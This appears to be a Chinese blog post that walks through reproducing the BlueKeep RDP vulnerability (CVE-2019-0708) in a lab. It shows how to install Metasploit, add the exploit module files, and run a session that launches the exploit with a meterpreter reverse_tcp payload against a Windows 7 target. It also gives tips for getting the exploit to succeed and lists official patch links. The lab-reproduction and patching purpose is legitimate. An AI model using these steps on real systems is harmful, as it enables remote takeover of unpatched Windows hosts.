CVE-2019-0708复现

发表于 | 分类于
字数统计: 1k | 阅读时长 ≈ 5


CVE-2019-0708复现

前言

此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。

影响

  • Windows 8和Windows 10及之后版本的用户不受此漏洞影响。

工具

msf

  • 安装msf

    1
    2
    3
    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
      chmod 755 msfinstall && \
      ./msfinstall

  • 更新msf

    1
    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

ps:如果重装的msf.可能会遇到gem库的问题,遇到pcaprb无法安装的时候
输入sudo apt-get install libpcap-dev
然后继续bundle install

替换文件

执行以下命令,如果报没有文件夹错误,请mkdir创建文件夹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

网上有将文件放置usr目录下的教程,我出现不能调用模块的问题了,所以参考了放置opt目录解决了问题

重置数据库

命令如下

msfdb reinit

参数含义

target参数

1
2
3
4
5
6
7
Available targets:
  Id  Name
  --  ----
  1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
  2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
  3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
  4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

实验

靶机win7 x64

1
2
3
4
5
6
7
8
9
10
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.233.130
lhost => 192.168.233.130
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.233.128
rhosts => 192.168.233.128
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

注意

目前公开的利用代码可用于攻击Windows 7 SP1 x64Windows 2008 R2 x64,该EXP并不稳定,针对 Windows 7 SP1 x64攻击有可能导致蓝屏。并且Windows2008 R2 x64需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0才能攻击成功。实验时记得关闭防火墙,不然会出现下面情况

效果

拿到靶机权限

补丁

360网盘 (提取码:68c8)

官方源:

操作系统版本 补丁下载链接
Windows 7 x86 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu
Windows 7 x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Windows Embedded Standard 7 for x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Windows Embedded Standard 7 for x86 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu
Windows Server 2008 x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu
Windows Server 2008 Itanium http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu
Windows Server 2008 x86 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu
Windows Server 2008 R2 Itanium http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu
Windows Server 2008 R2 x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Windows Server 2003 x86 http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 x64 http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe
Windows XP SP3 http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP SP2 for x64 http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe
Windows XP SP3 for XPe http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe
WES09 and POSReady 2009 http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/04/windowsxp-kb4500331-x86-embedded-chs_e3fceca22313ca5cdda811f49a606a6632b51c1c.exe

参考文章

1.360微信推文

2.xsser博客复现

3.github项目

4.xkkhh复现

-------------The End-------------